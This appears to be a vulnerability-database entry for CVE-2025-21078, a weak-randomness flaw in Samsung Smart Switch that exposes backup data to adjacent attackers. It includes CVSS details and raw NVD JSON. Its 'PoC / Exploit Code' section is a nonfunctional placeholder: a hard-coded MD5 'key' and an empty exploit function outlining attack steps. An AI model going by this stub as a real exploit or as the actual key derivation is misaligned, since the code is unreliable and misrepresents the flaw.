Security Vulnerability Report
CVE-2025-21078 CVSS 8.8 HIGH

Published: 2025-11-05 06:15:34
Last Modified: 2025-11-07 15:46:38

Description

Use of insufficiently random value of secretKey in Smart Switch prior to version 3.7.68.6 allows adjacent attackers to access backup data from applications.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:samsung:smart_switch:*:*:*:*:*:*:*:* - VULNERABLE
Smart Switch < 3.7.68.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
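import requests
import hashlib
import secrets

# CVE-2025-21078 PoC - Samsung Smart Switch key prediction
# This PoC demonstrates how the weak random number generation flaw can be exploited


def generate_predictable_key():
    # Simulate insecure key generation
    timestamp = 1234567890
    seed = hashlib.md5(str(timestamp).encode()).hexdigest()
    return seed


def exploit_backup_access(target_ip):
    # Step 1: Listen on the adjacent network to obtain the timestamp
    # Step 2: Predict the key
    # Step 3: Decrypt the backup data
    pass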

References

https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=11 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-21078", "sourceIdentifier": "[email protected]", "published": "2025-11-05T06:15:34.103", "lastModified": "2025-11-07T15:46:38.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of insufficiently random value of secretKey in Smart Switch prior to version 3.7.68.6 allows adjacent attackers to access backup data from applications."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:smart_switch:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.68.6", "matchCriteriaId": "147D1C7F-B40F-4638-84B9-8132366F7323"}]}]}], "references": [{"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2025&month=11", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}